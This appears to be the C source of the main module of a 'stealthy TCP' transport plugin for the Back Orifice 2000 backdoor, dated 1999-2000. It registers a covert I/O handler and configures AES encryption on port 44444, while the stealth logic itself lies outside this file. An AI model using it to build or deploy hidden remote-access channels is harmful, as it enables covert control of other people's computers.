/*	STCPIO Stealthy TCPIO Plugin for Back Orifice 2000
	Copyright (C) 1999-2000, Daniel Roethlisberger

	This program is free software; you can redistribute it and/or modify
	it under the terms of the GNU General Public License as published by
	the Free Software Foundation; either version 2 of the License, or
	(at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

	The author of this program may be contacted at admin@roe.ch.
*/

#include <windows.h>
#include <linkage.h>
#include "main.h"

// plugin globals
PLUGIN_LINKAGE g_Link;
HINSTANCE g_hInstance;
BOOL g_bActive;

// our stuff
int g_nIOHandler;

extern IO_HANDLER *GetStealthyTcpIOHandler(void);

char g_szSTCPIOOptions[] = "<**CFG**>STCPIO\0"
							"S[16]:" CONFIG_ENC "=AES\0\0\0\0\0\0\0\0\0\0\0\0\0\0"
							"N[0,65535]:" CONFIG_PORT "=44444\0";

BOOL WINAPI DllMain(HINSTANCE hInst, ULONG ul_reason_for_call, LPVOID lpReserved)
{
	switch (ul_reason_for_call)
	{
		case DLL_PROCESS_ATTACH:
			g_hInstance=hInst;
			break;
	}
	return TRUE;
}

BOOL InstallPlugin(PLUGIN_LINKAGE *ppl)
{
	g_bActive = TRUE;
	
	g_Link = *ppl;
	
	g_nIOHandler = g_Link.pIOHandler->Insert(GetStealthyTcpIOHandler());
	if(g_nIOHandler < 0) 
		return FALSE;
	
	return TRUE;
}

void TerminatePlugin(void)
{
	g_bActive = FALSE;
	g_Link.pIOHandler->Remove(g_nIOHandler);
}

BOOL PluginVersion(PLUGIN_VERSION *ppv)
{
	ppv->svFilename = PL_PLUGIN_FILENAME;
	ppv->svDescription = PL_PLUGIN_DESCRIPTION;
	ppv->wVersionHi = PL_PLUGIN_VERSION / 10;
	ppv->wVersionLo = PL_PLUGIN_VERSION % 10;
	ppv->wBOVersionHi = PL_BO2K_VERSION / 10;
	ppv->wBOVersionLo = PL_BO2K_VERSION % 10;
	ppv->dwFlags = PVF_SERVER | PVF_CLIENT;
	return TRUE;
}
